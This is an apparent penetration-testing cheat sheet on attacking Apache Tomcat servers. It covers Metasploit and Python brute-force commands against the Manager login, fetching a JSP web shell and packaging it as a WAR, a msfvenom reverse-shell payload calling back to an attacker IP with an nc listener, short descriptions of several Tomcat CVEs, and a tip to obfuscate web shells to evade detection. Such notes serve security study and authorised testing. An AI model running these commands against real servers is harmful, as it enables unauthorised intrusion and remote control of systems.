search
LinkedInGithub
githubEdit

8. Attacking Tomcat

hashtag
1. Tomcat Manager Brute-Force:

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT <target_port>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST <target_vhost>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
python3 mgr_brute.py -U http://<target>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

  • Brute-force attack on Tomcat Manager login.

hashtag
2. WAR File Upload (After Login):

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

  • Upload the .war file via /manager/html interface.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f war > backup.war
nc -lnvp <attacker_port>

  • Generates a reverse shell .war payload and sets up a listener.

hashtag
3. CVE-2020-1938 (Ghostcat - AJP LFI Exploit):

  • Exploits the AJP protocol to read sensitive files.

hashtag
4. Exploiting CVE-2009-3548 (Tomcat Deployment Bypass):

  • Uploads a .war file without authentication on vulnerable Tomcat instances.

hashtag
5. Exploiting CVE-2017-12617 (Arbitrary JSP Upload via HTTP PUT):

  • Allows arbitrary JSP file upload, enabling remote command execution.

hashtag
6. Tomcat Weak Configuration & Exploitation:

  • Many Tomcat servers use default credentials.

hashtag
7. Exploiting CVE-2020-9484 (Tomcat Deserialization RCE):

  • Exploits Java deserialization in persistent sessions for RCE.

hashtag
8. Attacking Tomcat with Metasploit (JSP Upload via RCE):

  • Deploys a JSP shell on a vulnerable Tomcat instance.

hashtag
9. Exploiting Tomcat with JMX RMI (CVE-2016-8735):

  • Gains remote access via exposed JMX RMI endpoints.

hashtag
10. Tomcat JMX Exploitation:

  • Enumerates and interacts with JMX services for possible RCE.

hashtag
11. Tomcat Connectors (AJP & HTTP Connector Misconfigurations):

  • AJP connectors can expose internal resources.

  • HTTP connectors can lead to authentication bypass.

hashtag
12. Important Considerations & Post-Exploitation:

  • /manager Access: Direct access can lead to RCE.

  • Default Credentials: Often present and should be checked first.

  • Ghostcat (CVE-2020-1938): Can expose sensitive configuration files.

  • WAR Files: Can be used for persistence and privilege escalation.

  • JMX Attacks: Can allow attackers to execute arbitrary code.

  • Version-Specific Vulnerabilities: Always check Tomcat’s version for known exploits.

  • Web Shell Security: Encrypt and obfuscate web shells to evade detection.

  • Post-Exploitation: Once inside, enumerate the system and escalate privileges.

hashtag
Example Additions:

  • AJP Exploitation: "The AJP protocol, if misconfigured, can allow access to internal resources and serious attacks."

  • Tomcat JMX Exploitation: "Tomcat JMX can execute arbitrary code by interacting with MBeans."

  • Tomcat Connectors: "Tomcat connectors, such as the AJP and HTTP connectors, can be misconfigured, leading to security risks."

  • Web Shell Evasion: "Web shells can be obfuscated and encoded to bypass security measures."

  • Post-Exploitation: "After gaining access to a Tomcat server, it is important to enumerate the system and find other vulnerabilities."

  • Tomcat Version-Specific Attacks: "Tomcat versions often have unique vulnerabilities, requiring targeted research."

Previous7. Tomcat Discovery And EnumerationNext9. Attacking Jenkins Focused Commands & Key Points

Last updated